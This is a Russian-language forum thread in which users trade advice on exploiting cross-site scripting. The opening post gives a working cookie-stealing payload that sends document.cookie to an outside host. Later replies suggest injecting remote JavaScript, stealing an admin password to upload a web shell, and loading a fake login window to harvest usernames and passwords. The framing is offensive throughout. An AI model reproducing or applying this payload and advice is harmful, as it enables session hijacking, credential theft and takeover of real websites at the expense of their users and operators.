Есть пассивная XSS, работает только с этим кодом:


Code:

img = new Image(); img.src = "http://httpz.ru/n4zjm6erzao.gif?"+document.cookie;


За кражу cookie отвечает +document.cookie;

А что можно еще сделать с XSS?

Можно ли загнать на сервер какого нибудь червя?

panfilov1991 said:
Можно ли загнать на сервер какого нибудь червя?


Нельзя. Такое в редких случаях можно проделать только с активами и то код будет работать только на тех страницах, где он будет вшит.

Inoms said:
Нельзя. Такое в редких случаях можно проделать только с активами и то код будет работать только на тех страницах, где он будет вшит.


Есть на примере активная XSS.

Где взять код который можно попробовать вшить?

panfilov1991 said:
Есть на примере активная XSS.
Где взять код который можно попробовать вшить?


Подразумевается html\js сценарий, можно любой кинуть, или проинклудить js.

Inoms said:
Подразумевается html\js сценарий, можно любой кинуть, или проинклудить js.


То что код можно вшить любой я понял, как это сделать я не понимаю!

подскажите пожалуйста!

panfilov1991 said:
То что код можно вшить любой я понял, как это сделать я не понимаю!
подскажите пожалуйста!


Так-же, как вы выполняете код сниффера, только вместо него, требуемый код. А проинклудить js можно так: "", через него можно выполнять и html (document.write и т.д). То, что вы "вошьёте" через пассиву, будет существовать только конкретно для вас, т.е не запишется на страницу статически, а только после отправки запроса на уязвимый параметр.

panfilov1991 said:
как это сделать я не понимаю!


Выучить JS самому или заказать у кого-нибудь написание кода за деньги.

upd:

Пример того, что можно делать с пассивкой - /thread275417.html

Что мешает с помощью XSS украсть пароль админа и там уже дальше залить шелл или что тебе там нужно?

сделай js файл который подменит окно авторизации,

черз свою xss подгрузи этот файл, и логины:пароли у тебя в кармане, если повезет может и админа подловишь